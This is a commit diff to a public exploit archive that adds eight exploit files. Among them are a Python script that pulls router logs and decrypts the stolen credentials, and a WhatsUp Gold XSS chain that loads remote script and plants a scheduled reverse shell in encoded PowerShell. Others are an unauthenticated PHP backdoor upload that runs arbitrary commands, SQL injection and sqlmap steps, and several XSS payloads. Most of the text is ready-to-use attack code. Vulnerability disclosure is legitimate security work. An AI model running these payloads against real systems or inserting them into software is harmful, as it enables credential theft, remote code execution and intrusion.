DB: 2024-02-06

10 changes to exploits/shellcodes/ghdb Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption WhatsUp Gold 2022 (22.1.0 Build 39) - XSS Clinic's Patient Management System 1.0 - Unauthenticated RCE Curfew e-Pass Management System 1.0 - FromDate SQL Injection GYM MS - GYM Management System - Cross Site Scripting (Stored) MISP 2.4.171 - Stored XSS TASKHUB-2.8.8 - XSS-Reflected Wordpress 'simple urls' Plugin < 115 - XSS
2024-02-06 00:16:29 +00:00 · 2024-02-06 00:16:29 +00:00 · 0c65b881ba
commit 0c65b881ba
parent 81ae91fdae
10 changed files with 473 additions and 3 deletions
--- a/exploits/hardware/remote/51784.py
+++ b/exploits/hardware/remote/51784.py
@ -0,0 +1,81 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 """
 Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
 CVE: CVE-2023-43261
 Script Author: Bipin Jitiya (@win3zz)
 Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
 Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.
 Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
 Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
 """
 import sys
 import requests
 import re
 import warnings
 from Crypto.Cipher import AES # pip install pycryptodome
 from Crypto.Util.Padding import unpad
 import base64
 import time
 warnings.filterwarnings("ignore")
 KEY = b'1111111111111111'
 IV = b'2222222222222222'
 def decrypt_password(password):
    try:
        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
    except ValueError as e:
        display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')
 def display_output(message, color):
    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}
    print(f"{colors[color]}{message}{colors['end']}")
    time.sleep(0.5)
 urls = []
 if len(sys.argv) == 2:
    urls.append(sys.argv[1])
 if len(sys.argv) == 3 and sys.argv[1] == '-f':
    with open(sys.argv[2], 'r') as file:
        urls.extend(file.read().splitlines())
 if len(urls) == 0:
    display_output('Please provide a URL or a file with a list of URLs.', 'red')
    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')
    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')
    sys.exit()
 use_proxy = False
 proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None
 for url in urls:
    display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')
    response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)
    if response.status_code == 200:
        display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')
        data = response.text
        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))
        num_credentials = len(credentials)
        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')
        if num_credentials > 0:
            display_output('[+] Login page: ' + url + '/login.html', 'green')
            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
            display_output('[+] Unique Credentials:', 'yellow')
            for i, (username, password) in enumerate(credentials, start=1):
                display_output(f'    Credential {i}:', 'cyan')
                decrypted_password = decrypt_password(password.encode('utf-8'))
                display_output(f'      - Username: {username}', 'green')
                display_output(f'      - Password: {decrypted_password}', 'green')
        else:
            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
    else:
        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')
--- a/exploits/multiple/webapps/51781.txt
+++ b/exploits/multiple/webapps/51781.txt
@ -0,0 +1,139 @@
 # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)
 # Date: April 18, 2023
 # Exploit Author: Andreas Finstad (4ndr34z)
 # Vendor Homepage: https://www.whatsupgold.com
 # Version: v.22.1.0 Build 39
 # Tested on: Windows 2022 Server
 # CVE : CVE-2023-35759
 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759
 WhatsUp Gold 2022 (22.1.0 Build 39)
 Stored XSS in sysName SNMP parameter.
 Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)
 Product Name: WhatsUp Gold 2022
 Version: 22.1.0 Build 39
 Vulnerability Type: Stored Cross-Site Scripting (XSS)
 Description:
 WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP.
 An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.
 As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)
 The XSS trigger when clicking the "All names and addresses"
 Stage:
 Base64 encoded id property:
 var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);
 Staged payload placed in the SNMP sysName Field on a device:
 <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>
 payload:
 var vhost = window.location.protocol+'\/\/'+window.location.host
 addaction();
 async function addaction() {
 var arguments = ''
 let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{
    method: 'POST',
    headers: {
        'Connection': 'close',
        'Content-Length': '1902',
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
        'Accept': 'application/json',
        'Content-Type': 'application/json',
        'X-Requested-With': 'XMLHttpRequest',
        'sec-ch-ua-mobile': '?0',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
        'sec-ch-ua-platform': '"macOS"',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Dest': 'empty',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
    },
    credentials: 'include',
    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'
 });
 setTimeout(() => { getactions(); }, 1000);
 };
 async function getactions() {
 const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{
    method: 'GET',
    headers: {
        'Connection': 'close',
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
        'Accept': 'application/json',
        'Content-Type': 'application/json',
        'X-Requested-With': 'XMLHttpRequest',
        'sec-ch-ua-mobile': '?0',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
        'sec-ch-ua-platform': '"macOS"',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Dest': 'empty',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
    },
    credentials: 'include'
 });
 const actions = await response.json();
 var results = [];
 var searchField = "Name";
 var searchVal = "Systemtask";
 for (var i=0 ; i < actions.length ; i++)
 {
    if (actions[i][searchField] == searchVal) {
        results.push(actions[i].Id);
        revshell(results[0])
    }
 }
 //console.log(actions);
 };
 async function revshell(ID) {
 fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{
    method: 'POST',
    headers: {
        'Connection': 'close',
        'Content-Length': '2442',
        'Cache-Control': 'max-age=0',
        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"macOS"',
        'Upgrade-Insecure-Requests': '1',
        'Origin': 'https://192.168.16.100',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Sec-Fetch-Dest': 'iframe',
        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
    },
    credentials: 'include',
    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'
 });
 };
--- a/exploits/php/webapps/51777.txt
+++ b/exploits/php/webapps/51777.txt
@ -0,0 +1,36 @@
 # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)
 # Date: 29/09/2023
 # Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/
 # Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip
 # Version: 1.0
 # Last Update: 31 August 2022
 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
 # 1: Create user, login and go to profile.php
 # 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.
 # 3: When entering the profile.php page, document.cookie will be reflected every time.
 # Author
 This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.
 # About Rapplex
 Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.
 Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.
 So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines.
 "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.
 # HTTP Request
 POST /gym/profile.php HTTP/1.1
 Host: localhost
 Content-Length: 129
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE
 Connection: close
 fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update
--- a/exploits/php/webapps/51778.txt
+++ b/exploits/php/webapps/51778.txt
@ -0,0 +1,20 @@
 # Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
 Injection
 # Date: 28/9/2023
 # Exploit Author: Puja Dey
 # Vendor Homepage: https://phpgurukul.com
 # Software Link:
 https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
 # Version: 1.0
 # Tested on: Windows 10/Wamp
 1) login into the application
 2) click on report on pass and capture the request in burpsuite
 3) Parameter "FromDate" is vulnerable to SQL Injection
 Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
 'SOzQ'='SOzQ&todate=&submit=
 4) Put '*' in the value for the parameter and save the item as cpme
 5) Run sqlmap -r cpme --batch --dbs --random-agent
--- a/exploits/php/webapps/51779.txt
+++ b/exploits/php/webapps/51779.txt
@ -0,0 +1,101 @@
 # Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
 # Date: 07.10.2023
 # Exploit Author: Oğulcan Hami Gül
 # Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
 # Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
 # Version: 1.0
 # Tested on: Windows 10
 ## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
 POST /pms/users.php HTTP/1.1
 Host: 192.168.1.36
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
 Content-Length: 1054
 Origin: http://192.168.1.36
 Connection: close
 Referer: http://192.168.1.36/pms/users.php
 Upgrade-Insecure-Requests: 1
 -----------------------------421755697017784551042596452367
 Content-Disposition: form-data; name="display_name"
 sefa7
 -----------------------------421755697017784551042596452367
 Content-Disposition: form-data; name="user_name"
 sefa7
 -----------------------------421755697017784551042596452367
 Content-Disposition: form-data; name="password"
 sefa7
 -----------------------------421755697017784551042596452367
 Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
 Content-Type: application/x-php
 <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
 <?php
 if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
 }
 ?>
 Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
 <!--    http://michaeldaw.org   2006    -->
 -----------------------------421755697017784551042596452367
 Content-Disposition: form-data; name="save_user"
 -----------------------------421755697017784551042596452367--
 ## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.
 ## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.
--- a/exploits/php/webapps/51780.txt
+++ b/exploits/php/webapps/51780.txt
@ -0,0 +1,17 @@
 # Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated)
 # Date: 8th October 2023
 # Exploit Author: Mücahit Çeri
 # Vendor Homepage: https://www.circl.lu/
 # Software Link: https://github.com/MISP/MISP
 # Version: 2.4.171
 # Tested on: Ubuntu 20.04
 # CVE : CVE-2023-37307
 # Exploit:
 Logged in as low privileged account
 1)Click on the "Galaxies" button in the top menu
 2)Click "Add Cluster" in the left menu.
 3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter.
 4)Other fields are filled randomly. Click on Submit button.
 5)When the relevant cluster is displayed, we see that alert(1) is running
--- a/exploits/php/webapps/51782.txt
+++ b/exploits/php/webapps/51782.txt
@ -0,0 +1,29 @@
 ## Title: TASKHUB-2.8.8-XSS-Reflected
 ## Author: nu11secur1ty
 ## Date: 09/22/2023
 ## Vendor: https://codecanyon.net/user/infinitietech
 ## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
 ## Reference: https://portswigger.net/web-security/cross-site-scripting
 ## Description:
 The value of the JSON parameter within the project parameter is copied
 into the HTML document as plain text between tags. The payload
 vn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSON
 parameter within the project parameter. This input was echoed
 unmodified in the application's response. The already authenticated
 (by using a USER ACCOUNT)attacker can get a CSRF token and cookie
 session it depends on the scenarios.
 [+]Test exploit:
 surw7%3Cscript%3Ealert(1)%3C%2fscript%3E
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)
 ## Proof and Exploit:
 [href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 home page: https://www.nu11secur1ty.com/
--- a/exploits/php/webapps/51783.txt
+++ b/exploits/php/webapps/51783.txt
@ -0,0 +1,24 @@
 # Exploit Title: simple urls < 115  XSS
 # Google Dork:
 # Exploit Author: AmirZargham
 # Vendor Homepage: https://getlasso.co/
 # Software Link: https://wordpress.org/plugins/simple-urls/
 # Version: < 115
 # Tested on: firefox,chrome
 # CVE: CVE-2023-0099
 # CWE: CWE-79
 # Platform: MULTIPLE
 # Type: WebApps
 Description
 The Simple URLs WordPress plugin before 115 does not sanitise and escape
 some parameters before outputting them back in some pages, leading to
 Reflected Cross-Site Scripting.
 Usage Info:
 send malicious link to victim:
 https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=
 <script>alert(origin)</script>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3754,6 +3754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,,2018-03-13,2018-03-13,0,,,,,,https://github.com/BigNerd95/Chimay-Red/tree/36faf04e9ffb224811e0ac074a62126fdca7a92f
 44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,,2018-03-16,2018-03-16,0,CVE-2018-7445,,,,,https://www.reddit.com/r/netsec/comments/84o6ki/mikrotik_routeros_smb_buffer_overflow/
 46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware,,2019-02-21,2019-02-21,1,CVE-2019-3924,,,,,
 51784,exploits/hardware/remote/51784.py,"Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption",2024-02-05,"Bipin Jitiya",remote,hardware,,2024-02-05,2024-02-05,0,,,,,,
 51094,exploits/hardware/remote/51094.txt,"MiniDVBLinux 5.4  - Change Root Password",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
 51096,exploits/hardware/remote/51096.py,"MiniDVBLinux 5.4  - Remote Root Command Injection",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
 51097,exploits/hardware/remote/51097.py,"MiniDVBLinux 5.4 - Arbitrary File Read",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
@ -12279,6 +12280,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44403,exploits/multiple/webapps/44403.rb,"WebRTC - Private IP Leakage (Metasploit)",2018-04-05,"Dhiraj Mishra",webapps,multiple,,2018-04-05,2018-04-05,0,CVE-2018-6849,,,,,
 50542,exploits/multiple/webapps/50542.txt,"Webrun 3.6.0.42 - 'P_0' SQL Injection",2021-11-23,"Vinicius Alves",webapps,multiple,,2021-11-23,2022-04-22,0,CVE-2021-43650,,,,,
 48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,,2020-04-06,2020-04-06,0,CVE-2019-18426,,,,,
 51781,exploits/multiple/webapps/51781.txt,"WhatsUp Gold 2022 (22.1.0 Build 39) - XSS",2024-02-05,"Andreas Finstad",webapps,multiple,,2024-02-05,2024-02-05,0,,,,,,
 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",2021-10-01,"Andreas Finstad",webapps,multiple,,2021-10-01,2021-10-01,0,CVE-2021-41318,,,,,
 10821,exploits/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,webapps,multiple,,2009-12-29,,0,,,,,,
 48154,exploits/multiple/webapps/48154.sh,"Wing FTP Server 6.2.5 - Privilege Escalation",2020-03-02,"Cary Hooper",webapps,multiple,,2020-03-02,2020-03-02,0,,,,,,
@ -15787,6 +15789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",2021-10-22,"Pablo Santiago",webapps,php,,2021-10-22,2021-11-29,0,,,,,,
 48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,,2020-06-04,2020-06-04,0,,,,,,
 46642,exploits/php/webapps/46642.txt,"Clinic Pro v4 - 'month' SQL Injection",2019-04-03,"Abdullah Çelebi",webapps,php,80,2019-04-03,2019-04-03,0,,"SQL Injection (SQLi)",,,,
 51779,exploits/php/webapps/51779.txt,"Clinic's Patient Management System 1.0 - Unauthenticated RCE",2024-02-05,"Oğulcan Hami Gül",webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php,,2009-07-23,,1,,,,,,
 12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,webapps,php,,2010-04-24,,1,,,,,,
 44346,exploits/php/webapps/44346.rb,"ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php,,2018-03-27,2018-03-27,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comclipbucket-4881.zip,https://raw.githubusercontent.com/rapid7/metasploit-framework/80c4d59560f0d596231f4dc2718bce25ff9bd00f/modules/exploits/multi/http/clipbucket_fileupload_exec.rb
@ -16506,6 +16509,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40343,exploits/php/webapps/40343.txt,"CumulusClips 2.4.1 - Multiple Vulnerabilities",2016-09-07,kor3k,webapps,php,80,2016-09-07,2016-09-07,0,,,,,http://www.exploit-db.comcumulusclips.zip,
 25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php,,2013-06-05,2016-10-24,1,OSVDB-94101,,,http://www.exploit-db.com/screenshots/idlt26000/screen-shot-2013-06-05-at-110840-am.png,http://www.exploit-db.comcuppa_cms.zip,
 47973,exploits/php/webapps/47973.txt,"Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)",2020-01-29,J3rryBl4nks,webapps,php,,2020-01-29,2020-01-29,0,CVE-2020-8425;CVE-2020-8424,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comcupseasylive-1.0.rar,
 51778,exploits/php/webapps/51778.txt,"Curfew e-Pass Management System 1.0 - FromDate SQL Injection",2024-02-05,"Puja Dey",webapps,php,,2024-02-05,2024-02-05,0,,,,,,
